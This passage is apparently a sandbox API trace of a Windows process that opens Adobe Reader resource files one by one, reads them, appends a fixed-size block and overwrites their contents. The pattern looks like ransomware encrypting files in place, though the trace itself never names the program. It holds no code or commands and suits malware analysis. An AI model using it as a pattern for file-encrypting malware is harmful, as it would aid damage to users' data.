SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.911] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.911] ReleaseMutex (hMutex=0x168) returned 1 [0115.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rus.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.911] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.953] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7000 [0116.862] ReadFile (in: hFile=0x1f0, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0116.862] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7000 [0116.862] WriteFile (in: hFile=0x1f0, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.863] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0116.863] WriteFile (in: hFile=0x1f0, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.863] CloseHandle (hObject=0x1f0) returned 1 [0116.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0116.864] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0116.864] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2e0 [0116.864] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0116.864] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.864] ReleaseMutex (hMutex=0x168) returned 1 [0116.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0116.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slo.fca", lpUsedDefaultChar=0x0) returned 7 [0116.864] ReadFile (in: hFile=0x1f0, lpBuffer=0x2664888, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2664888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2e0, lpOverlapped=0x0) returned 1 [0117.515] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0117.515] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x868, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2fdf2d0*=0x868, lpOverlapped=0x0) returned 1 [0117.515] CloseHandle (hObject=0x1f0) returned 1 [0117.515] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0117.517] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.517] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x36c [0117.517] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.517] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.517] ReleaseMutex (hMutex=0x168) returned 1 [0117.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spn.fca", lpUsedDefaultChar=0x0) returned 7 [0117.517] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2fdf2bc*=0x36c, lpOverlapped=0x0) returned 1 [0117.574] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0117.574] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x8f4, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2fdf2d0*=0x8f4, lpOverlapped=0x0) returned 1 [0117.574] CloseHandle (hObject=0x1f0) returned 1 [0117.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0117.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x821bd [0117.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.576] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.576] ReleaseMutex (hMutex=0x168) returned 1 [0117.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd43.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="swd43.hsp", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swd43.hsp", lpUsedDefaultChar=0x0) returned 9 [0117.576] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0117.612] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.633] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x811bd [0117.633] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.898] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x811bd [0117.899] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.899] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0117.899] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.900] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.900] CloseHandle (hObject=0x1f0) returned 1 [0117.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0117.901] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.901] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa1c00 [0117.901] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.902] ReleaseMutex (hMutex=0x168) returned 1 [0117.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa03.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa03.ths", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usa03.ths", lpUsedDefaultChar=0x0) returned 9 [0117.902] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0117.916] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.944] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa0c00 [0117.944] ReadFile (in: hFile=0x1f0, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.968] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa0c00 [0117.969] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.970] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0117.970] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0117.970] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.970] CloseHandle (hObject=0x1f0) returned 1 [0117.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0117.972] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.972] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29ed0 [0117.972] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.972] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.972] ReleaseMutex (hMutex=0x168) returned 1 [0117.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JISX0213.txt", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JISX0213.txt", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JISX0213.txt", lpUsedDefaultChar=0x0) returned 12 [0117.972] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0117.980] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28ed0 [0117.980] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.990] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28ed0 [0117.990] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.995] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0117.995] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.995] CloseHandle (hObject=0x1f0) returned 1 [0117.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0117.996] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.997] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x34f0 [0117.997] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0117.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.997] ReleaseMutex (hMutex=0x168) returned 1 [0117.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CROATIAN.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CROATIAN.TXT", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CROATIAN.TXT", lpUsedDefaultChar=0x0) returned 12 [0117.997] ReadFile (in: hFile=0x1f0, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0117.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x24f0 [0117.999] ReadFile (in: hFile=0x1f0, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.000] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x24f0 [0118.000] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.000] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.000] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.000] CloseHandle (hObject=0x1f0) returned 1 [0118.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3857 [0118.002] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.002] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.002] ReleaseMutex (hMutex=0x168) returned 1 [0118.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROMAN.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROMAN.TXT", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROMAN.TXT", lpUsedDefaultChar=0x0) returned 9 [0118.002] ReadFile (in: hFile=0x1f0, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.007] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2857 [0118.007] ReadFile (in: hFile=0x1f0, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2857 [0118.034] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.034] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.034] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.034] CloseHandle (hObject=0x1f0) returned 1 [0118.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT" (normalized: 